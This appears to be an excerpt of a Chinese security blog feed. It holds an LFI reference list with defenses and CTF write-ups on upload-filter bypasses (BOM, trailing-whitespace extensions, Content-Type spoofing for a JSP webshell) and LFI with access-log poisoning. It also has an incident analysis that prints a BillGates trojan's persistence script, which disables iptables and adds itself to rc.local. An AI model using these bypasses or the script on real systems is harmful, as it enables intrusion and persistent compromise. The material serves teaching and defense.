inclusion vulnerability notes</a><br><a href="https://highon.coffee/blog/lfi-cheat-sheet/">LFI Cheat Sheet</a><br><a href="https://github.com/lucyoa/ctf-wiki/tree/master/web/file-inclusion">Local File Inclusion</a></p><p><a href="http://wiki.wooyun.org/web:lfi">http://wiki.wooyun.org/web:lfi</a></p><p>PHP file inclusion vulnerability summary:<br><a href="http://drops.wooyun.org/tips/3827">http://drops.wooyun.org/tips/3827</a></p><p>File inclusion and injection exploitation summary:<br><a href="https://www.91ri.org/2736.html">https://www.91ri.org/2736.html</a></p><p>On php://input, php://filter and the data URI scheme:<br><a href="https://www.91ri.org/7470.html">https://www.91ri.org/7470.html</a></p><p>The phar protocol:<br><a href="https://www.91ri.org/13363.html">https://www.91ri.org/13363.html</a></p><p>On common PHP vulnerabilities:<br><a href="http://drops.wooyun.org/papers/4544">http://drops.wooyun.org/papers/4544</a></p><p>LFI WITH PHPINFO() ASSISTANCE:<br><a href="https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf">https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf</a></p><p>PHP_LFI_rfc1867_temporary_files:<br><a href="http://gynvael.coldwind.pl/download.php?f=PHP_LFI_rfc1867_temporary_files.pdf">http://gynvael.coldwind.pl/download.php?f=PHP_LFI_rfc1867_temporary_files.pdf</a></p><p>Including files via the zip or phar protocol<br><a href="http://bl4ck.in/index.php/tricks/use-zip-or-phar-to-include-file.html">http://bl4ck.in/index.php/tricks/use-zip-or-phar-to-include-file.html</a></p><h1 id="工具-amp-amp-防御"><a href="#工具-amp-amp-防御" class="headerlink" title="工具&&防御"></a>Tools && defenses</h1><p>Tools:</p><p><a href="https://github.com/P0cL4bs/Kadimus/">https://github.com/P0cL4bs/Kadimus/</a></p><p>Defenses:</p><ul><li>Set open_basedir so that include() cannot reach outside the application directory.</li><li>Better still, never pass user input to include(): map a fixed set of page names to file paths and reject everything else. A wrapper prefix (php://, phar://, zip://, data:) in the parameter is never legitimate.</li></ul>]]></content>
<summary type="html"><center><h2> `"A blog, after all, is nothing more than self-admiration"`</h2></center></summary>
<category term="php文件包含" scheme="https://cr4ckm3.top/tags/php%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/"/>
</entry>
<entry>
<title>强网杯 International Elite Invitational: Web knowledge points</title>
<link href="https://cr4ckm3.top/2018/05/20/qiangwangbei/"/>
<id>https://cr4ckm3.top/2018/05/20/qiangwangbei/</id>
<published>2018-05-19T16:00:00.000Z</published>
<updated>2019-08-30T10:00:43.723Z</updated>
<content type="html"><![CDATA[<h1 id="py到出题人的说明:"><a href="#py到出题人的说明:" class="headerlink" title="py到出题人的说明:"></a>py到出题人的说明:</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">随意输入用户名进入,用户名使用addslashes过滤,取xff等变量为ip显示</span><br><span class="line"></span><br><span class="line">上传文件黑名单过滤了常见php后缀,大小写不敏感,可以在后缀后加空格绕过检测</span><br><span class="line"></span><br><span class="line">使用fileinfo检测MIME必须为php文件,text/x-php,文件内容检测开头不能使用<?,可以使用bom头绕过内容检测</span><br><span class="line"></span><br><span class="line">随机生成64位长度的文件名,上传成功后在主页显示当前用户上传的文件名,但只显示前10个字符</span><br><span class="line"></span><br><span class="line">文件上传成功时会将用户名,IP和文件名入库,如果用户名长度超过20位则截取前20个字符,所以可以构造一个用户名,前十九位随意填写,第二十位填写单引号等会被addslashes转义的符号,入库时因为有截取操作所以可以使用遗留下来的反斜线吃掉单引号造成注入,IP处可以进行注入,过滤了空格和一些函数,可以使用mid函数进行字符串截取操作</span><br><span class="line"></span><br><span class="line">随意使用一个用户名绕过上传过滤得到一个webshell,构造特殊用户名上传文件通过insert注入获取之前上传得webshell真实文件名,上传目录为常见的uploads文件夹,很容易就能被扫到</span><br><span class="line"></span><br><span class="line">使用构造后的用户名「xxx',」注意有因为注入遗留下来得单引号和逗号 ,登入后可以看到很多个被截断后的文件名,拼接起来就是文件名</span><br></pre></td></tr></table></figure><h1 id="upload-php"><a href="#upload-php" class="headerlink" title="upload.php"></a>upload.php</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span 
class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_FILES</span>[<span class="string">'upfile'</span>])) {</span><br><span class="line"> <span class="variable">$file</span> = <span class="variable">$_FILES</span>[<span class="string">'upfile'</span>];</span><br><span class="line"> <span class="keyword">if</span> (<span class="variable">$file</span> [<span class="string">'error'</span>] > <span class="number">0</span>) {</span><br><span class="line"> <span class="keyword">switch</span> (<span 
class="variable">$file</span> [<span class="string">'error'</span>]) {</span><br><span class="line"> <span class="keyword">case</span> <span class="number">1</span> :</span><br><span class="line"> <span class="variable">$mes</span> = <span class="string">'The uploaded file exceeds the value of the upload_max_filesize option in the PHP configuration file'</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="number">2</span> :</span><br><span class="line"> <span class="variable">$mes</span> = <span class="string">'Exceeded the size of the form MAX_FILE_SIZE limit'</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="number">3</span> :</span><br><span class="line"> <span class="variable">$mes</span> = <span class="string">'File section was uploaded'</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="number">4</span> :</span><br><span class="line"> <span class="variable">$mes</span> = <span class="string">'No upload file selected'</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="number">6</span> :</span><br><span class="line"> <span class="variable">$mes</span> = <span class="string">'No temporary directory found'</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="number">7</span> :</span><br><span class="line"> <span class="keyword">case</span> <span class="number">8</span> :</span><br><span class="line"> <span class="variable">$mes</span> = <span class="string">'System error'</span>;</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> 
}</span><br><span class="line"> <span class="keyword">die</span>(<span class="variable">$mes</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="variable">$content</span> = file_get_contents(<span class="variable">$file</span>[<span class="string">'tmp_name'</span>]);</span><br><span class="line"> checkMIME(<span class="variable">$file</span>);</span><br><span class="line"> <span class="keyword">if</span> (checkContent(<span class="variable">$content</span>) && checkExts(<span class="variable">$file</span>[<span class="string">'name'</span>])) {</span><br><span class="line"> upload(<span class="variable">$file</span>);</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">die</span>(<span class="string">'attack detected'</span>);</span><br><span class="line"> }</span><br><span class="line">} <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">die</span>(<span class="string">'file not found'</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">upload</span>(<span class="params"><span class="variable">$file</span></span>)</span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="variable">$savepath</span> = dirname(<span class="keyword">__file__</span>) . <span class="string">'/uploads/'</span>;</span><br><span class="line"> <span class="variable">$filename</span> = explode(<span class="string">'.'</span>, <span class="variable">$file</span>[<span class="string">'name'</span>]);</span><br><span class="line"> <span class="variable">$newname</span> = rand_name() . <span class="string">"."</span> . trim(end(<span class="variable">$filename</span>));</span><br><span class="line"> <span class="variable">$finalname</span> = <span class="variable">$savepath</span> . 
<span class="variable">$newname</span>;</span><br><span class="line"> <span class="keyword">if</span> (move_uploaded_file(<span class="variable">$file</span>[<span class="string">'tmp_name'</span>], <span class="variable">$finalname</span>)) {</span><br><span class="line"> <span class="variable">$db</span> = <span class="keyword">new</span> Database();</span><br><span class="line"> <span class="comment">//,1,(select substring(filename,10,10) from(select filename from picture limit 0,1)x))#</span></span><br><span class="line"> <span class="keyword">if</span> (<span class="variable">$db</span>->insert(<span class="variable">$_SESSION</span>[<span class="string">'username'</span>], getip(), <span class="variable">$newname</span>)) {</span><br><span class="line"> header(<span class="string">'location: index.php'</span>);</span><br><span class="line"> <span class="keyword">exit</span>();</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h1 id="checkMIME"><a href="#checkMIME" class="headerlink" title="checkMIME()"></a>checkMIME()</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">checkMIME</span>(<span class="params"><span class="variable">$file</span></span>)</span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="comment">// text/php text/x-php</span></span><br><span class="line"> <span class="variable">$php_ext</span> = <span class="keyword">array</span>(<span class="string">"text/php"</span>, <span 
class="string">"text/x-php"</span>);</span><br><span class="line"> <span class="variable">$type</span> = mime_content_type(<span class="variable">$file</span>[<span class="string">'tmp_name'</span>]);</span><br><span class="line"> <span class="keyword">if</span>(!in_array(strtolower(<span class="variable">$type</span>), <span class="variable">$php_ext</span>)){</span><br><span class="line"> <span class="keyword">die</span>(<span class="string">"i need php file"</span>);</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h1 id="checkContent"><a href="#checkContent" class="headerlink" title="checkContent()"></a>checkContent()</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">checkContent</span>(<span class="params"><span class="variable">$content</span></span>)</span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">if</span> (stripos(<span class="variable">$content</span>, <span class="string">'<?'</span>) === <span class="number">0</span>) {</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h1 id="checkExts"><a href="#checkExts" class="headerlink" title="checkExts()"></a>checkExts()</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span 
class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">checkExts</span>(<span class="params"><span class="variable">$filename</span></span>)</span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="variable">$AllowedExt</span> = <span class="keyword">array</span>(<span class="string">'php'</span>, <span class="string">'php3'</span>, <span class="string">'php4'</span>, <span class="string">'php5'</span>, <span class="string">'pht'</span>, <span class="string">'phtml'</span>, <span class="string">'inc'</span>);</span><br><span class="line"> <span class="variable">$filename</span> = explode(<span class="string">'.'</span>, <span class="variable">$filename</span>);</span><br><span class="line"> <span class="keyword">if</span> (in_array(strtolower(<span class="variable">$filename</span>[count(<span class="variable">$filename</span>) - <span class="number">1</span>]), <span class="variable">$AllowedExt</span>)) {</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h1 id="知识点"><a href="#知识点" class="headerlink" title="知识点"></a>知识点</h1><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span 
class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"> <span class="variable">$content</span> = file_get_contents(<span class="variable">$file</span>[<span class="string">'tmp_name'</span>]);</span><br><span class="line"> checkMIME(<span class="variable">$file</span>);</span><br><span class="line"> <span class="keyword">if</span> (checkContent(<span class="variable">$content</span>) && checkExts(<span class="variable">$file</span>[<span class="string">'name'</span>])) {</span><br><span class="line"> upload(<span class="variable">$file</span>);</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">die</span>(<span class="string">'attack detected'</span>);</span><br><span class="line"> }</span><br><span class="line">} <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">die</span>(<span class="string">'file not found'</span>);</span><br><span class="line">}</span><br><span class="line"></span><br></pre></td></tr></table></figure><h2 id="如何绕过checkMIME-?"><a href="#如何绕过checkMIME-?" class="headerlink" title="如何绕过checkMIME()?"></a>如何绕过<code>checkMIME()</code>?</h2><p>我们先了解下<a href="https://www.leavesongs.com/PENETRATION/XDCTF-2015-WEB2-WRITEUP.html#3mime-type">p牛的博客->mime-type</a></p><p>首先我们上传的文件一定要是php文件,因为<code>checkMIME()</code>的<code>mime_content_type()</code> 检测文件名。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php的fileinfo扩展是通过文件内容来猜测文件的mime type,我们传入的文件,只要前几个字符是<?php,那么就会返回text/x-php</span><br></pre></td></tr></table></figure><p><code>checkContent()</code>检测文件的首次出现的是否为<code><?</code>,如果检测到就会判定是<code>attack</code>。</p><h2 id="如何绕过checkContent-?"><a href="#如何绕过checkContent-?" 
class="headerlink" title="如何绕过checkContent()?"></a>How to bypass <code>checkContent()</code>?</h2><ul><li>Use a BOM (as written by Windows editors).</li></ul><p><code>A file with a BOM header</code> has \xef\xbb\xbf as its first 3 bytes, so it no longer starts with <code><?</code>.</p><p>Yet fileinfo still judges the file to be text/x-php, so the <code>checkContent()</code> check is bypassed.</p><ul><li>Use <code>#!/usr/bin/php</code> </li></ul><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">#!/usr/bin/php tells the operating system to invoke the php interpreter under /usr/bin when executing this script;</span><br><span class="line"></span><br><span class="line">#!/usr/bin/env php is used in case the user did not install php in the default /usr/bin path. When the system sees this line, it first looks up php's install path in the env settings, then invokes the interpreter at that path.</span><br><span class="line"></span><br><span class="line">#!/usr/bin/php hardcodes the php path;</span><br><span class="line">#!/usr/bin/env php looks up the php directory from the environment settings.</span><br></pre></td></tr></table></figure><h2 id="如何绕过checkExts-?"><a href="#如何绕过checkExts-?" 
class="headerlink" title="如何绕过checkExts()?"></a>How to bypass <code>checkExts()</code>?</h2><p>Appending a <code>space</code>, <code>\t</code>, <code>\n</code>, <code>\r</code>, <code>\0</code> or <code>\x0B</code> to the PHP file name bypasses the <code>checkExts()</code> check.</p><p>That is, something like: <code>filename.php </code> (.php%20)</p><p>The later <code>upload()</code> function calls <code>trim()</code>, which strips the whitespace characters.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">This function returns the string str with leading and trailing whitespace removed. If the second parameter is not given, trim() strips these characters:</span><br><span class="line"></span><br><span class="line"> " " (ASCII 32 (0x20)), an ordinary space.</span><br><span class="line"> "\t" (ASCII 9 (0x09)), a tab.</span><br><span class="line"> "\n" (ASCII 10 (0x0A)), a newline.</span><br><span class="line"> "\r" (ASCII 13 (0x0D)), a carriage return.</span><br><span class="line"> "\0" (ASCII 0 (0x00)), the NUL byte.</span><br><span class="line"> "\x0B" (ASCII 11 (0x0B)), a vertical tab.</span><br></pre></td></tr></table></figure><p>Space<br><img src="/image/1/00.png" alt="Space"></p><p>Newline<br><img src="/image/1/n.png" alt="Newline"></p><p>NUL byte<br><img src="/image/1/0.png" alt="NUL byte"></p><p>Vertical tab:<br><img src="/image/1/x0b.png" alt="Vertical tab"></p>]]></content>
<summary type="html"><h1 id="py到出题人的说明:"><a href="#py到出题人的说明:" class="headerlink" title="py到出题人的说明:"></a>Notes obtained (py'd) from the challenge setter:</h1><figure class="highlight plaintext"><tabl</summary>
<category term="CTF" scheme="https://cr4ckm3.top/tags/CTF/"/>
<category term="php" scheme="https://cr4ckm3.top/tags/php/"/>
</entry>
<entry>
<title>2018 Red Hat Cup Web writeups (partial)</title>
<link href="https://cr4ckm3.top/2018/05/01/2018%E7%BA%A2%E5%B8%BD%E6%9D%AF/"/>
<id>https://cr4ckm3.top/2018/05/01/2018%E7%BA%A2%E5%B8%BD%E6%9D%AF/</id>
<published>2018-05-01T00:30:54.000Z</published>
<updated>2019-08-30T10:00:44.733Z</updated>
<content type="html"><![CDATA[<h1 id="Simple-Upload"><a href="#Simple-Upload" class="headerlink" title="Simple Upload"></a>Simple Upload</h1><p>Opening the homepage and intercepting with Burp reveals <code>admin=0</code>; try changing it to <code>admin=1</code>.</p><p><img src="/image/simple_upload/index.png" alt="admin=0"></p><p>It then redirects to the <code>upload.html</code> page.</p><p><img src="/image/simple_upload/upload.png" alt="upload.html"></p><p>After some testing, only <code>jpg/png</code> files are allowed. We also gathered that the system is <code>linux</code> and the web middleware is <code>Apache Tomcat</code>.</p><p>So the rough approach is clear:</p><ul><li>Apache file name truncation vulnerability</li><li>Apache parsing vulnerability</li><li>Modify Content-Type</li><li>Image webshell</li></ul><p>What finally works is changing <code>Content-Type</code> to <code>image/jpeg</code>, after which any file can be uploaded.</p><p>One thing to note here: the uploaded PHP file has no effect. But since the middleware is <code>Apache Tomcat</code>, try uploading a JSP webshell instead.</p><p><img src="/image/simple_upload/jsp.png" alt="jsp.png"></p><p>Upload succeeds and it is parsed!</p><p>Finally, the flag is found in the root directory.</p><p><img src="/image/simple_upload/flag.png" alt="flag.png"></p><h1 id="Shopping-Log"><a href="#Shopping-Log" class="headerlink" title="Shopping Log"></a>Shopping Log</h1><ul><li><code>http://123.59.141.153/</code> or <code>http://120.132.95.234/</code></li></ul><p>This challenge isn't very interesting: the first few steps are adapted from challenges on 实验吧 (an old challenge re-released), and the last step is just MD5 brute-forcing plus brute-forcing a 4-digit order number. Really 🐄</p><p>Opening it shows a blank page with only one comment: <code><!-- Site is tmvb.com --></code></p><p>So I finally got to watch the big shots in the group do their social engineering 😄</p><p>Correct approach:</p><ul><li>Edit the <code>hosts</code> file to point <code>www.tmvb.com</code> at the server, and then you can see:</li></ul><p><img src="/image/shopping_log/index.png" alt="index.png"></p><ul><li>Set <code>referer:www.dww.com</code> to pass the first step</li></ul><p><img src="/image/shopping_log/1.png" alt="1.png"></p><ul><li>Set <code>Accept-Language: ja</code> to pass the second step</li></ul><p>Reference: <a href="http://www.lingoes.cn/zh/translator/langcode.htm">Language Code Table</a></p><p><code>Japan sales only</code> roughly means the request has to come from Japan. Bypass idea: modify <code>Accept-Language</code> or <code>X-Forwarded-For</code>.</p><p><img src="/image/shopping_log/2.png" alt="2.png"></p><ul><li>The page then redirects to an order lookup page</li></ul><p><img src="/image/shopping_log/3.png" 
alt="3.png"></p><ul><li>Brute-force the 4-digit order number plus the MD5 captcha</li></ul><p>This step was a real pain: the order number that finally came out of the brute-force was <code>9588</code>, and several teammates spent a whole afternoon running it...</p><p><img src="/image/shopping_log/4.png" alt="4.png"></p><p><img src="/image/shopping_log/5.png" alt="5.png"></p><p>I won't paste the script; if you need one it can be found online, and if you really can't find it, ask me.</p><h1 id="guess-id"><a href="#guess-id" class="headerlink" title="guess id"></a>guess id</h1><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">emmmmmmmmmmm, this challenge was probably there to stop the big shots from AK-ing (solving everything), so nobody solved it; waiting for the official writeup</span><br><span class="line"></span><br></pre></td></tr></table></figure><h1 id="biubiubiu"><a href="#biubiubiu" class="headerlink" title="biubiubiu"></a>biubiubiu</h1><p>I heard that most of the solves were unintended: <code>file inclusion + access.log parsing</code> to get a shell.</p><p>The intended solution, however, is <code>ssrf+gopher</code>.</p><p>This challenge is fairly close to a real-world scenario.</p><p>Below is the unintended approach:</p><ul><li>File inclusion</li></ul><p><code>http://08f43db931ee48ef984062844dcc216747512e8278834ba7.game.ichunqiu.com/index.php?page=../../../../../../etc/passwd</code></p><ul><li>Arbitrary content can be written into nginx's access.log</li></ul><p><code>../../../../../../var/log/nginx/access.log</code></p><p><img src="/image/biubiubiu/UA.png" alt="UA"></p><p><img src="/image/biubiubiu/1.png" alt="1.png"></p><p><img src="/image/biubiubiu/shell.png" alt="shell"></p><ul><li>The written shell is parsed, but the server runs something like SafeDog (狗) that blocks China Chopper (菜刀), so everyone used a WAF-evading (过狗) shell.</li></ul><p>What's left is digging out the flag.</p><p><img src="/image/biubiubiu/flag.png" alt="flag"></p><p>For the intended solution, wait for the official writeup.</p>]]></content>
<summary type="html"><h1 id="Simple-Upload"><a href="#Simple-Upload" class="headerlink" title="Simple Upload"></a>Simple Upload</h1><p>Opening the homepage and intercepting with Burp reveals <code>admin=0<</summary>
<category term="writeup" scheme="https://cr4ckm3.top/tags/writeup/"/>
<category term="CTF" scheme="https://cr4ckm3.top/tags/CTF/"/>
</entry>
<entry>
<title>Analysis of a compromised server</title>
<link href="https://cr4ckm3.top/2018/04/28/BillGates/"/>
<id>https://cr4ckm3.top/2018/04/28/BillGates/</id>
<published>2018-04-28T12:00:00.000Z</published>
<updated>2019-08-30T10:00:42.843Z</updated>
<content type="html"><![CDATA[<h1 id="起因"><a href="#起因" class="headerlink" title="起因"></a>Cause</h1><p>In the morning the boss sent over a task: contact the person in charge of a certain server and see what was going on with it.</p><h1 id="经过"><a href="#经过" class="headerlink" title="经过"></a>What happened</h1><p>The person in charge described:</p><ul><li>New users were being created inexplicably</li><li>Abnormal traffic appeared, reaching 14 GB</li><li>Logins from unusual IPs occurred in three time windows on the 27th</li><li>Ports 22, 80 and 5001 are open to the outside</li><li>Some logs are missing</li></ul><p>Port 5001 is the data API of the app server.</p><h1 id="开始分析"><a href="#开始分析" class="headerlink" title="开始分析"></a>Starting the analysis</h1><p>After getting an account and logging in, the first thing is to be clear about what can be done and what needs to be done.<br>A quick look showed the deployed web application runs with root privileges.<br>Listing processes with <code>ps -aux</code> showed nothing much running.<br>Also, typing commands felt very laggy, and the session often froze or dropped. So I checked with <code>top</code> and found a process sysxlv using 104% CPU, which is a big problem.<br>After asking the administrator, it was not one of their applications.<br>So the source of the problem was found.</p><h1 id="进一步寻找"><a href="#进一步寻找" class="headerlink" title="进一步寻找"></a>Digging further</h1><p>Think from the hacker's perspective: if I were the attacker, what would I do to keep my access? This is an important part of the post-exploitation phase of a penetration.<br>How access is maintained</p><ul><li>Leave a backdoor</li><li>Persistent in-memory webshell</li><li>Scheduled scripts</li><li>Startup tasks</li></ul><h1 id="BillGates木马"><a href="#BillGates木马" class="headerlink" title="BillGates木马"></a>The BillGates trojan</h1><p>The script was found via two autostart entries in the <code>/etc/rc.d/rc.local</code> file:</p><p><img src="/image/muma/rc.local.jpg" alt="rc.local.jpg"></p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">touch /var/lock/subsys/<span class="built_in">local</span></span><br><span class="line">sh /etc/jourxlv &</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>The <code>jourxlv</code> script is as follows:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span 
class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="comment">#!/bin/bash</span></span><br><span class="line"><span class="comment">#Welcome like-minded friends to come to exchange.</span></span><br><span class="line"><span 
class="comment">#We are a group of people who have a dream.</span></span><br><span class="line"><span class="comment"># by:sysxlj</span></span><br><span class="line"><span class="comment"># 2016-03-10</span></span><br><span class="line">service iptables stop > /dev/null 2>&1 &</span><br><span class="line">host_dir=`<span class="built_in">pwd</span>`</span><br><span class="line"><span class="keyword">if</span> [ <span class="string">"sh <span class="variable">$host_dir</span>/jourxlv &"</span> = <span class="string">"<span class="subst">$(cat /etc/rc.local | grep $host_dir/jourxlv | grep -v grep)</span>"</span> ]; <span class="keyword">then</span></span><br><span class="line"> <span class="built_in">echo</span> <span class="string">""</span></span><br><span class="line"><span class="keyword">else</span></span><br><span class="line"> <span class="built_in">echo</span> <span class="string">"sh <span class="variable">$host_dir</span>/jourxlv &"</span> >> /etc/rc.local</span><br><span class="line"><span class="keyword">fi</span></span><br><span class="line">cp sysxlj /usr/bin/aher</span><br><span class="line">cp jourxlv /usr/bin/keudl</span><br><span class="line"><span class="keyword">while</span> [ 1 ]; <span class="keyword">do</span></span><br><span class="line"> Centos_sshd_killn=$(ps aux | grep <span class="string">"<span class="variable">$host_dir</span>/sysxlj"</span> | grep -v grep | wc -l)</span><br><span class="line"> <span class="keyword">if</span> [[ <span class="variable">$Centos_sshd_killn</span> -eq 0 ]]; <span class="keyword">then</span></span><br><span class="line"> <span class="keyword">if</span> [ ! 
-f <span class="string">"<span class="variable">$host_dir</span>/sysxlj"</span> ]; <span class="keyword">then</span></span><br><span class="line"> <span class="keyword">if</span> [ -f <span class="string">"/usr/bin/aher"</span> ]; <span class="keyword">then</span></span><br><span class="line"> cp /usr/bin/aher <span class="variable">$host_dir</span>/sysxlj</span><br><span class="line"> chmod 755 ./sysxlj</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> <span class="built_in">echo</span> <span class="string">"No weeget"</span></span><br><span class="line"><span class="keyword">fi</span></span><br><span class="line"> <span class="keyword">fi</span></span><br><span class="line"> ./sysxlj &</span><br><span class="line"> <span class="keyword">elif</span> [[ <span class="variable">$Centos_sshd_killn</span> -gt 1 ]]; <span class="keyword">then</span></span><br><span class="line"> <span class="keyword">for</span> killed <span class="keyword">in</span> $(ps aux | grep <span class="string">"<span class="variable">$host_dir</span>/sysxlj"</span> | grep -v grep | awk <span class="string">'{print $2}'</span>); <span class="keyword">do</span></span><br><span class="line"> Centos_sshd_killn=$((<span class="variable">$Centos_sshd_killn</span>-<span class="number">1</span>))</span><br><span class="line"> <span class="keyword">if</span> [[ <span class="variable">$Centos_sshd_killn</span> -eq 1 ]]; <span class="keyword">then</span></span><br><span class="line"> <span class="built_in">continue</span></span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> <span class="built_in">kill</span> -9 <span class="variable">$killed</span></span><br><span class="line"> <span class="keyword">fi</span></span><br><span class="line"> <span class="keyword">done</span></span><br><span class="line"> <span class="keyword">else</span></span><br><span 